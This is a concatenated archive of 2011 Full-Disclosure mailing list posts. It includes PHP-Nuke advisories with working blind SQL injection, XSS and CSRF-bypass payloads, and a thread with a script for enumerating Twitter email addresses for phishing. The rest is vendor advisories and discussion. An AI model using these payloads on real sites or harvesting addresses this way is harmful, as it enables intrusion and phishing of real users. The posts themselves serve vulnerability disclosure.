[Full-disclosure] [Tool Update Announcement] inspathx
Tool Home: http://code.google.com/p/inspathx/ CHANGELOG = Stat: path definitions - 342 , path vuln definitions - 140 == Added --xp as alias --x-p == Refined param array that supports any number of dimensions with -p option (i.e -p 1, -p 2, -p 3) - Thanks to Brendan Coles http://code.google.com/p/inspathx/wiki/OPTION_Param_Array == Added dotnet 1.x ASPX Full Path Disclosure (tilde character /~.aspx) - Thanks to Ryan Dewhurst http://code.google.com/p/inspathx/wiki/ASPNET_FULL_PATH_DISCLOSURE_DOTNET1X - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using Twitter for Phishing Campaign / Spam / Followers?
it works surprisingly well considering
2011/3/21 Cal Leeming c...@foxwhisper.co.uk
Yeah, just noticed that. Soon as I get some spare time, I'll prob have a
shot at making one. It'd be interesting to know what the success rate /
latency / concurrency / hours of availability are when using decaptcher (due
to it being human based), I can't imagine it'd be very good :S
On Mon, Mar 21, 2011 at 12:32 PM, huj huj huj datski...@gmail.com wrote:
decapther doesn't use ocr though
they use the indian workforce
not sure about deathbycaptcha but i think its the same principle
2011/3/18 Cal Leeming c...@foxwhisper.co.uk
Lol, I didn't know about the commercial product 'decaptcher'.
For shits and giggles, I was going to write a decaptcha myself and
release as open source, never had time though :S
One option would be to apply rate limitations to API calls per IP.
Or, possibly some realy heavily obfuscated JS which does key
calculation with a matching server side algo, and injects the value into the
form upon submission. This is one of the methods we use on our paid adult
sites. Unless the person is really determined (and has the patience to
deobfuscate, then port to their own code), or their bots have spidermonkey
built in, then it usually fends off most botters.
To make it harder, we also have a library of about 500 of these (each
with a different key build algo), which are cycled automatically lol.
Example:
$(function() { var
_0xafd3=[\x74\x20\x3D\x20\x22,,\x6A\x6F\x69\x6E,\x72\x65\x76\x65\x72\x73\x65,\x73\x70\x6C\x69\x74,\x72\x65\x70\x6C\x61\x63\x65,\x22];eval(_0xafd3[0]+s[_0xafd3[5]](/ZPAK/gi,_0xafd3[1])[_0xafd3[5]](/\,\/gi,_0xafd3[1])[_0xafd3[5]](/\/gi,_0xafd3[1])[_0xafd3[4]](_0xafd3[1])[_0xafd3[3]]()[_0xafd3[2]](_0xafd3[1])+_0xafd3[6]);
var
_0x5bfa=[\x3C\x69\x6E\x70\x75\x74\x20\x2F\x3E,\x74\x79\x70\x65,\x68\x69\x64\x64\x65\x6E,\x61\x74\x74\x72,\x6E\x61\x6D\x65,\x73\x65\x65\x64\x6B\x65\x79,\x76\x61\x6C\x75\x65,\x61\x70\x70\x65\x6E\x64,\x23\x74\x68\x65\x66\x6F\x72\x6D];_n=$(_0x5bfa[0]);_n[_0x5bfa[3]](_0x5bfa[1],_0x5bfa[2]);_n[_0x5bfa[3]](_0x5bfa[4],_0x5bfa[5]);_n[_0x5bfa[3]](_0x5bfa[6],t);$(_0x5bfa[8])[_0x5bfa[7]](_n);
});
Again, not perfect, but it's worked well for us :)
On Fri, Mar 18, 2011 at 3:58 PM, huj huj huj datski...@gmail.comwrote:
with services like decaptcher and deathbycaptcha this would not be a
hindrance anyway
2011/3/15 Cal Leeming c...@foxwhisper.co.uk
Agreed. These public API methods should have brute force protection at
the very least. But, because they want instant in-line form validation for
email address availability, this makes it difficult. In an ideal world,
they'd have a CAPTCHA on the form, and only validate upon submit with
valid
captcha.
On Tue, Mar 15, 2011 at 3:02 PM, Reverse Skills
cont...@reverseskills.com wrote:
The problem is to allow unlimited access to that resource, not the
resource itself.
2011/3/15 Cal Leeming c...@foxwhisper.co.uk:
This conceptual flaw exists in most web apps which have a reset
password by
email address feature, as most will display an error if the email
address
does not exist in their database.
On Tue, Mar 15, 2011 at 12:19 PM, Reverse Skills
cont...@reverseskills.com
wrote:
Simple and easy way to get a list of email accounts used on
Twitter.
For Phishing campaigns, custom Spam...
Twitter has been notified and I suppose someday be fixed if they
think
there should be filtered.
When you create a new Twitter account, the form requesting a
mailing
address. Twitter verify that the email account is not being used,
but
does not check any user token or limit the usage (captcha/block).
https://twitter.com/signup -
http://twitter.com/users/email_available?email=
We just need to automate it with a simple script , ***Everything
you
do will be your responsibility***
---
#!/usr/bin/python
import sys, json, urllib2, os
f =
urllib2.urlopen(http://twitter.com/users/email_available?email=
+sys.argv[1])
data = json.load(f)
def valid()
..
Email has already been taken in data [msg] -- reply
..
---
We just need a list of users to test.. for example :
http://twitter.com/about/employees (don't be evil is just an
example!)
Parsing the name/nickname and testing the {user}@twitter.com a few
minutes later we have a list of ~ 400 valid internal email
*@twitter.com. An attacker could probably.. a brute force attack
(Google Apps), would send Phishing or try to exploit some browser
bugs
or similar. #Aurora #Google. Most of these e-mail are internal, not
public..
There are also some that make you think they are used to such
A-Directory system users :
..
apa...@twitter.com
r...@twitter.com
m...@twitter.com
..
But, if you download a database Rockyou / Singles.org / Gawker /
Rootkit.com or just a typical dictionaries and domains will be
quite
easy to get hold of a
[Full-disclosure] Hack In Paris 2011 Call For Papers Reminder
Hello FD! This is just a reminder that the Call for Papers for Hack In Paris 2011 is closing on 30th of March. We've received some very nice submissions so far. Hack In Paris will take place in Disneyland Paris Conference Center and will be split into two parts: * June 14-15: Trainings * June 16-17: Talks Please do not hesitate to submit! Your submission should contain the following elements: * The biography of each author * A short description (abstract) of your presentation * The summary of your research, including technical information; in particular novel research with regards to the state of the art * An estimation of your expenses (trip and hotel) Please send your proposal to cfp[at]hackinparis[dot]com. Contact Social Media == Contact:info[at]hackinparis[dot]com Website:http://www.hackinparis.com/ Twitter:http://twitter.com/hackinparis Facebook: http://www.facebook.com/pages/Hack-In-Paris/134611446603792 Linkedin: http://www.linkedin.com/groups?gid=3750882 -- the HIP team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP-Nuke 8.x = chng_uid Blind SQL Injection Vulnerability
PHP-Nuke 8.x = Blind SQL Injection Vulnerability 1. OVERVIEW The administration backend of PHP-Nuke 8.x is vulnerable to Blind SQL Injection. 2. BACKGROUND PHP-Nuke is a Web Portal System or content management system. The goal of PHP-Nuke is to have an automated web site to distribute news and articles with users system. Each user can submit comments to discuss the articles. Main features include: web based admin, surveys, top page, access stats page with counter, user customizable box, themes manager for registered users, friendly administration GUI with graphic topic manager, option to edit or delete stories, option to delete comments, moderation system, Referrers page to know who link us, sections manager, customizable HTML blocks, user and authors edit, an integrated Banners Ads system, search engine, backend/headlines generation (RSS/RDF format), and many, many more friendly functions. 3. VULNERABILITY DESCRIPTION The chng_uid parameter is not properly sanitized upon submission to the /admin.php which leads to Blind SQL Injection vulnerability. This allows an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. 4. VERSIONS AFFECTED 8.0 and lower Tested version: 8.0 The paid versions, 8.1 and 9.0, of php-Nuke may be vulnerable as well. 5. PROOF-OF-CONCEPT/EXPLOIT = /admin.php POST /admin.php HTTP/1.1 Referer: http://localhost/admin.php?op=mod_users Content-Type: application/x-www-form-urlencoded Host: localhost chng_uid=[BLIND_SQL_INJECTION]+op=modifyUser Tested Payloads: ' or 1=1-- [TRUE] ' or 1=2-- [FALSE] ' or substring(@@version,1,1)=5-- [TRUE if mySQL version is 5.x] ' or substring(@@version,1,1)=4-- [FALSE if mySQL version is 5.x] ' or SLEEP(15)=0-- [sleep for 15 seconds] Successful response (True) returns the user update form page. 6. SOLUTION Lock down access to php-Nuke administration backend. No patch is available yet. Use of this product is NOT recommended because of long lack of update and vendor negligence about security reports. 7. VENDOR php-Nuke Developers http://phpnuke.org/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-01-01: contacted author through emails 2011-01-25: contacted author through web site contact form 2010-03-23: no replies from author 2010-03-23: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_sql_injection About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke PHP-Nuke 8.0: http://phpnuke.org/modules.php?name=Downloadsd_op=getitlid=658 CWE-89: http://cwe.mitre.org/data/definitions/89.html #yehg [2010-03-23] keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1, blind, sqlin, sql injection - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP-Nuke 8.x = Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass Vulnerability
PHP-Nuke 8.x = Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass
Vulnerability
1. OVERVIEW
The PHP-Nuke version 8.x and lower versions are vulnerable to Cross
Site Request Forgery (CSRF) because its Anti-CSRF mechanism (Referer
Check) is found to be broken.
2. BACKGROUND
PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page, access stats page with counter, user customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete
comments, moderation system, Referrers page to know who link us,
sections manager, customizable HTML blocks, user and authors edit, an
integrated Banners Ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions.
3. VULNERABILITY DESCRIPTION
The PHP-Nuke version 8.x and lower versions contain a flaw that allows
a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions for majority of
administrator functions such as adding new user, assigning user to
administrative privilege. By using a crafted URL, an attacker may
trick the victim into visiting to his web page to take advantage of
the trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.
4. VERSIONS AFFECTED
8.0 and lower
Tested version: 8.0
The paid versions, 8.1 and 9.0, of PHP-Nuke may be vulnerable as well.
5. PROOF-OF-CONCEPT/EXPLOIT
Consider the following code snippet in /mainfile.php of PHP-Nuke:
//
109 if(!function_exists('stripos')) {
function stripos_clone($haystack, $needle, $offset=0) {
$return = strpos(strtoupper($haystack),
strtoupper($needle), $offset);
if ($return === false) {
return false;
} else {
return true;
}
}
} else {
// But when this is PHP5, we use the original function
function stripos_clone($haystack, $needle, $offset=0) {
$return = stripos($haystack, $needle,
$offset=0);
if ($return === false) {
return false;
} else {
return true;
}
}
128 }
..
206 // Posting from other servers in not allowed
207 // Fix by Quake
208 // Bug found by PeNdEjO
210 if ($_SERVER['REQUEST_METHOD'] == POST) {
if (isset($_SERVER['HTTP_REFERER'])) {
212 if (!stripos_clone($_SERVER['HTTP_REFERER'],
$_SERVER['HTTP_HOST'])) {
die('Posting from another server not
allowed!');
}
} else {
die($posttags);
}
}
//
It is clear that stripos_clone checks HTTP_REFERER value whether it
matches the target domain or not.
Attacker can easily bypass it by creating victim domain name under his
web root folder like:
http://attacker.in/victim.com/
From there, he could effectively perform CSRF attacks against php-Nuke users.
A short P0C demo video can be seen at
http://yehg.net/lab/pr0js/training/view/misc/PHPNuke_8x_Anti-CSRF-Bypass/
6. SOLUTION
Not Available.
Use of this product is NOT recommended because of long lack of update
and vendor negligence about security reports.
7. VENDOR
PHP-Nuke Developers
http://phpnuke.org/
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2011-01-01: contacted author through emails
2011-01-25: contacted author through web site contact form
2010-03-23: no replies from author
2010-03-23: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_cross_site_request_forgery
CSRF Wiki:
https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
PHP-Nuke
[Full-disclosure] [ MDVSA-2011:052 ] php
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:052 http://www.mandriva.com/security/ ___ Package : php Date: March 23, 2011 Affected: 2009.0, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been identified and fixed in php: The _zip_name_locate function in zip_name_locate.c in the Zip extension in PHP before 5.3.6 does not properly handle a ZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent attackers to cause a denial of service (application crash) via an empty ZIP archive that is processed with a (1) locateName or (2) statName operation (CVE-2011-0421). exif.c in the Exif extension in PHP before 5.3.6 on 64-bit platforms performs an incorrect cast, which allows remote attackers to cause a denial of service (application crash) via an image with a crafted Image File Directory (IFD) that triggers a buffer over-read (CVE-2011-0708). Integer overflow in ext/shmop/shmop.c in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (crash) and possibly read sensitive memory via a large third argument to the shmop_read function (CVE-2011-1092). Multiple format string vulnerabilities in phar_object.c in the phar extension in PHP 5.3.5 and earlier allow context-dependent attackers to obtain sensitive information from process memory, cause a denial of service (memory corruption), or possibly execute arbitrary code via format string specifiers in an argument to a class method, leading to an incorrect zend_throw_exception_ex call (CVE-2011-1153). Buffer overflow in the strval function in PHP before 5.3.6, when the precision configuration option has a large value, might allow context-dependent attackers to cause a denial of service (application crash) via a small numerical value in the argument (CVE-2011-1464). Integer overflow in the SdnToJulian function in the Calendar extension in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (application crash) via a large integer in the first argument to the cal_from_jd function (CVE-2011-1466). Unspecified vulnerability in the NumberFormatter::setSymbol (aka numfmt_set_symbol) function in the Intl extension in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (application crash) via an invalid argument, a related issue to CVE-2010-4409 (CVE-2011-1467). Unspecified vulnerability in the Streams component in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (application crash) by accessing an ftp:// URL during use of an HTTP proxy with the FTP wrapper (CVE-2011-1469). The Zip extension in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (application crash) via a ziparchive stream that is not properly handled by the stream_get_contents function (CVE-2011-1470). Integer signedness error in zip_stream.c in the Zip extension in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (CPU consumption) via a malformed archive file that triggers errors in zip_fread function calls (CVE-2011-1471). The previous fix for #43486 got lost along the line and is now being fixed again. Note: the php-phar (CVE-2011-1153) and php-intl (CVE-2011-1467) packages was shipped with Enterprise Server 5 only and is also being fixed with this advisory. Additionally sqlite3 was upgraded to 3.7.3 for Corporate Server 4 which has numerous bug fixes and enhancements over the previous version. Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149amp;products_id=490 The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0421 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0708 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1092 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1153 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1464 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1466 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1467 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1469 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1470 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1471 https://qa.mandriva.com/43486 ___ Updated Packages: Mandriva Linux 2009.0: 2aad1219df9af834bfddc38736c71f5c
[Full-disclosure] PHP-Nuke 8.x = Cross Site Scripting Vulnerability
PHP-Nuke 8.x = Cross Site Scripting Vulnerability 1. OVERVIEW The PHP-Nuke version 8.x and lower are vulnerable to Cross Site Scrtipting. 2. BACKGROUND PHP-Nuke is a Web Portal System or content management system. The goal of PHP-Nuke is to have an automated web site to distribute news and articles with users system. Each user can submit comments to discuss the articles. Main features include: web based admin, surveys, top page, access stats page with counter, user customizable box, themes manager for registered users, friendly administration GUI with graphic topic manager, option to edit or delete stories, option to delete comments, moderation system, Referrers page to know who link us, sections manager, customizable HTML blocks, user and authors edit, an integrated Banners Ads system, search engine, backend/headlines generation (RSS/RDF format), and many, many more friendly functions. 3. VULNERABILITY DESCRIPTION The sender_name and the sender_email parameter are not properly sanitized upon submission to the /modules.php?name=Feedback, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 8.0 and lower Tested version: 8.0 The paid versions, 8.1 and 9.0, of PHP-Nuke may be vulnerable as well. 5. PROOF-OF-CONCEPT/EXPLOIT Parameter: sender_name [REQUEST] POST /phpnuke/modules.php?name=Feedback HTTP/1.1 Host: attacker.in Referer: http://attacker.in/phpnuke/modules.php?name=Feedback sender_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS%2F%29%3Esender_email=message=opi=dssubmit=Send [/REQUEST] - Parameter: sender_email [REQUEST] POST /phpnuke/modules.php?name=Feedback HTTP/1.1 Host: attacker.in Referer: http://attacker.in/phpnuke/modules.php?name=Feedback sender_email=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS%2F%29%3Esender_name=message=opi=dssubmit=Send [/REQUEST] 6. SOLUTION Not Available. Use of this product is NOT recommended because of long lack of update and vendor negligence about security reports. 7. VENDOR PHP-Nuke Developers http://phpnuke.org/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-01-01: contacted author through emails 2011-01-25: contacted author through web site contact form 2010-03-23: no replies from author 2010-03-23: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_cross_site_scripting About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke php-Nuke 8.0: http://phpnuke.org/modules.php?name=Downloadsd_op=getitlid=658 CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2010-03-23] keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1, xss - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:053 ] php
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:053 http://www.mandriva.com/security/ ___ Package : php Date: March 23, 2011 Affected: 2010.0, 2010.1 ___ Problem Description: Multiple vulnerabilities has been identified and fixed in php: The _zip_name_locate function in zip_name_locate.c in the Zip extension in PHP before 5.3.6 does not properly handle a ZIPARCHIVE::FL_UNCHANGED argument, which might allow context-dependent attackers to cause a denial of service (application crash) via an empty ZIP archive that is processed with a (1) locateName or (2) statName operation (CVE-2011-0421). exif.c in the Exif extension in PHP before 5.3.6 on 64-bit platforms performs an incorrect cast, which allows remote attackers to cause a denial of service (application crash) via an image with a crafted Image File Directory (IFD) that triggers a buffer over-read (CVE-2011-0708). Integer overflow in ext/shmop/shmop.c in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (crash) and possibly read sensitive memory via a large third argument to the shmop_read function (CVE-2011-1092). Multiple format string vulnerabilities in phar_object.c in the phar extension in PHP 5.3.5 and earlier allow context-dependent attackers to obtain sensitive information from process memory, cause a denial of service (memory corruption), or possibly execute arbitrary code via format string specifiers in an argument to a class method, leading to an incorrect zend_throw_exception_ex call (CVE-2011-1153). Buffer overflow in the strval function in PHP before 5.3.6, when the precision configuration option has a large value, might allow context-dependent attackers to cause a denial of service (application crash) via a small numerical value in the argument (CVE-2011-1464). Integer overflow in the SdnToJulian function in the Calendar extension in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (application crash) via a large integer in the first argument to the cal_from_jd function (CVE-2011-1466). Unspecified vulnerability in the NumberFormatter::setSymbol (aka numfmt_set_symbol) function in the Intl extension in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (application crash) via an invalid argument, a related issue to CVE-2010-4409 (CVE-2011-1467). Multiple memory leaks in the OpenSSL extension in PHP before 5.3.6 might allow remote attackers to cause a denial of service (memory consumption) via (1) plaintext data to the openssl_encrypt function or (2) ciphertext data to the openssl_decrypt function (CVE-2011-1468). Unspecified vulnerability in the Streams component in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (application crash) by accessing an ftp:// URL during use of an HTTP proxy with the FTP wrapper (CVE-2011-1469). The Zip extension in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (application crash) via a ziparchive stream that is not properly handled by the stream_get_contents function (CVE-2011-1470). Integer signedness error in zip_stream.c in the Zip extension in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service (CPU consumption) via a malformed archive file that triggers errors in zip_fread function calls (CVE-2011-1471). The updated php packages have been upgraded to 5.3.6 which is not vulnerable to these issues. Additionally some of the PECL extensions has been upgraded and/or rebuilt for the new php version. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0421 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0708 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1092 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1153 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1464 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1466 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1467 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1468 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1469 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1470 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1471 ___ Updated Packages: Mandriva Linux 2010.0: 360c127934a5787c7e6d8a29f16144b9 2010.0/i586/apache-mod_php-5.3.6-0.1mdv2010.0.i586.rpm 35910b8aefb974a002158baae205aa7e 2010.0/i586/libphp5_common5-5.3.6-0.1mdv2010.0.i586.rpm
[Full-disclosure] ZDI-11-111: (0Day) Hewlett-Packard Virtual SAN Appliance hydra.exe Login Request Remote Code Execution Vulnerability
ZDI-11-111: (0Day) Hewlett-Packard Virtual SAN Appliance hydra.exe Login Request Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-111 March 23, 2011 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard Virtual SAN Appliance -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Virtual SAN appliance. Authentication is not required to exploit this vulnerability. The flaw exists within the hydra.exe component which listens by default on port 13838. When parsing a login request the Hydra daemon will call sscanf() using fixed-length stack buffers and no length checks. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM service. -- Vendor Response: March 23, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. -- Mitigations: This vulnerability could be mitigated by administrators by restricting communication with the hydra agent to known client IP addresses. -- Disclosure Timeline: 2010-09-24 - Vulnerability reported to vendor 2011-03-23 - Public release of advisory -- Credit: This vulnerability was discovered by: * Nicolas Gregoire of Agarri (www.agarri.fr) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-11-112: (0 day) Hewlett-Packard Data Protector Media Operations DBServer.exe Remote Code Execution Vulnerability
ZDI-11-112: (0 day) Hewlett-Packard Data Protector Media Operations DBServer.exe Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-112 March 23, 2011 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard Data Protector -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10590. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Data Protector. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DBServer.exe process which listens by default on TCP port 19813. While parsing a request, the process trusts a user-supplied 32-bit length value and uses it within a memory operation. By specifying large enough values in a packet sent to the service, a remote attacker can execute arbitrary code under the context of the SYSTEM user. -- Vendor Response: March 23, 2011 - This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 180 day deadline. -- Mitigations: To mitigate this vulnerability an administrator could restrict communication with this service to known client IP addresses. -- Disclosure Timeline: 2010-09-24 - Vulnerability reported to vendor 2011-03-23 - Public release of advisory -- Credit: This vulnerability was discovered by: * Roi Mallo -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Materials regarding Cyber-war
On 14 March 2011 17:24, bk cho...@gmail.com wrote: On Mar 14, 2011, at 10:04 AM, imipak wrote: On 14/03/11 16:51, bk wrote: The point you missed is that almost all the examples we've seen so far have been closer to espionage than to actual warfare. [...] Despite that, I agree. Espionage != War. People hyping cyberwar are either trying to increase their sales, budget, or jurisdiction. Report: Iran's paramilitary launches cyber attack http://www.google.com/hostednews/ap/article/ALeqM5jlwiVKEhlj8CjRz6dzR-McTlnRHw -i Yes, let's put a lot of stock in propaganda that amounts to we're in ur hostin providerz, defacin ur websitez. This is from the same regime that photoshopped in extra missiles to make their capabilities look stronger. Grow up. *cough* http://blogs.comodo.com/it-security/data-security/the-recent-ca-compromise/ -i ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS, AoF and IAA vulnerabilities in MC Content Manager
Hello list! I want to warn you about Cross-Site Scripting, Abuse of Functionality and Insufficient Anti-automation vulnerabilities in MC Content Manager. It's Ukrainian commercial CMS. - Affected products: - Vulnerable are potentially all versions of MC Content Manager (MC Content Manager v.10.1.1 and previous versions). -- Details: -- XSS (WASC-08): Vulnerabilities are at registration and password recovery pages. http://websecurity.com.ua/uploads/2011/MC%20Content%20Manager%20XSS.html http://websecurity.com.ua/uploads/2011/MC%20Content%20Manager%20XSS2.html http://websecurity.com.ua/uploads/2011/MC%20Content%20Manager%20XSS3.html Abuse of Functionality (WASC-42): http://site/users/register http://site/users/remind At registration and password recovery pages it's possible to enumerate e-mails of the users (which are logins). Insufficient Anti-automation (WASC-21): http://site/users/register http://site/users/remind Even captcha is using at these pages, it's not needed to enter correct captcha for enumeration of e-mails (logins) of the users. Timeline: 2011.01.24 - announced at my site. 2011.01.25 - informed developers. 2011.01.25 - received response from developers. 2011.01.25 - gave additional recommendations for developers. 2011.03.22 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4869/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Materials regarding Cyber-war
